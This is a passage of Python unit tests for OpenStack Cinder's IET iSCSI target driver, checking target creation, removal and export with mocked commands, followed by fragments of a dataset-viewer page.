self.assertTrue(mock_get_targ.called)\n\n # Test the failure case: Failed to chown the config file\n mock_open.side_effect = putils.ProcessExecutionError\n self.assertRaises(exception.ISCSITargetCreateFailed,\n self.target.create_iscsi_target,\n self.test_vol,\n 0,\n 0,\n self.fake_volumes_dir)\n\n # Test the failure case: Failed to set new auth\n mock_execute.side_effect = putils.ProcessExecutionError\n self.assertRaises(exception.ISCSITargetCreateFailed,\n self.target.create_iscsi_target,\n self.test_vol,\n 0,\n 0,\n self.fake_volumes_dir)\n\n @mock.patch('cinder.utils.execute')\n @mock.patch('os.path.exists', return_value=True)\n def test_update_config_file_failure(self, mock_exists, mock_execute):\n # Test the failure case: conf file does not exist\n mock_exists.return_value = False\n mock_execute.side_effect = putils.ProcessExecutionError\n self.assertRaises(exception.ISCSITargetCreateFailed,\n self.target.update_config_file,\n self.test_vol,\n 0,\n self.fake_volumes_dir,\n \"foo bar\")\n\n @mock.patch('cinder.volume.targets.iet.IetAdm._get_target',\n return_value=1)\n @mock.patch('cinder.utils.execute')\n def test_create_iscsi_target_already_exists(self, mock_execute,\n mock_get_targ):\n mock_execute.return_value = ('fake out', 'fake err')\n self.assertEqual(\n 1,\n self.target.create_iscsi_target(\n self.test_vol,\n 1,\n 0,\n self.fake_volumes_dir))\n self.assertTrue(mock_get_targ.called)\n self.assertTrue(mock_execute.called)\n\n @mock.patch('cinder.volume.targets.iet.IetAdm._find_sid_cid_for_target',\n return_value=None)\n @mock.patch('os.path.exists', return_value=False)\n @mock.patch('cinder.utils.execute')\n def test_remove_iscsi_target(self, mock_execute, mock_exists, mock_find):\n\n # Test the normal case\n self.target.remove_iscsi_target(1,\n 0,\n self.testvol['id'],\n self.testvol['name'])\n mock_execute.assert_any_call('ietadm',\n '--op',\n 'delete',\n '--tid=1',\n run_as_root=True)\n\n # Test the failure case: putils.ProcessExecutionError\n mock_execute.side_effect = putils.ProcessExecutionError\n self.assertRaises(exception.ISCSITargetRemoveFailed,\n self.target.remove_iscsi_target,\n 1,\n 0,\n self.testvol['id'],\n self.testvol['name'])\n\n def test_find_sid_cid_for_target(self):\n tmp_file = six.StringIO()\n tmp_file.write(\n 'tid:1 name:iqn.2010-10.org.openstack:volume-83c2e877-feed-46be-8435-77884fe55b45\\n' # noqa\n ' sid:844427031282176 initiator:iqn.1994-05.com.redhat:5a6894679665\\n' # noqa\n ' cid:0 ip:10.9.8.7 state:active hd:none dd:none')\n tmp_file.seek(0)\n with mock.patch('six.moves.builtins.open') as mock_open:\n mock_open.return_value = contextlib.closing(tmp_file)\n self.assertEqual(('844427031282176', '0'),\n self.target._find_sid_cid_for_target(\n '1',\n 'iqn.2010-10.org.openstack:volume-83c2e877-feed-46be-8435-77884fe55b45', # noqa\n 'volume-83c2e877-feed-46be-8435-77884fe55b45' # noqa\n ))\n\n @mock.patch('cinder.volume.targets.iet.IetAdm._get_target',\n return_value=1)\n @mock.patch('cinder.utils.execute')\n @mock.patch.object(iet.IetAdm, '_get_target_chap_auth')\n def test_create_export(self, mock_get_chap, mock_execute,\n mock_get_targ):\n mock_execute.return_value = ('', '')\n mock_get_chap.return_value = ('QZJbisGmn9AL954FNF4D',\n 'P68eE7u9eFqDGexd28DQ')\n expected_result = {'location': '10.9.8.7:3260,1 '\n 'iqn.2010-10.org.openstack:testvol 0',\n 'auth': 'CHAP '\n 'QZJbisGmn9AL954FNF4D P68eE7u9eFqDGexd28DQ'}\n ctxt = context.get_admin_context()\n self.assertEqual(expected_result,\n self.target.create_export(ctxt,\n self.testvol,\n self.fake_volumes_dir))\n self.assertTrue(mock_execute.called)\n\n @mock.patch('cinder.volume.targets.iet.IetAdm._get_target_chap_auth',\n return_value=None)\n @mock.patch('cinder.volume.targets.iet.IetAdm._get_target',\n return_value=1)\n def test_ensure_export(self, mock_get_targetm, mock_get_chap):\n ctxt = context.get_admin_context()\n with mock.patch.object(self.target, 'create_iscsi_target'):\n self.target.ensure_export(ctxt,\n self.testvol,\n self.fake_volumes_dir)\n self.target.create_iscsi_target.assert_called_once_with(\n 'iqn.2010-10.org.openstack:testvol',\n 1, 0, self.fake_volumes_dir, None,\n portals_ips=[self.configuration.iscsi_ip_address],\n portals_port=int(self.configuration.iscsi_port),\n check_exit_code=False,\n old_name=None)\n",
"step-ids": [
3,
7,
8,
9,
12
]
}
|
[
3,
7,
8,
9,
12
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.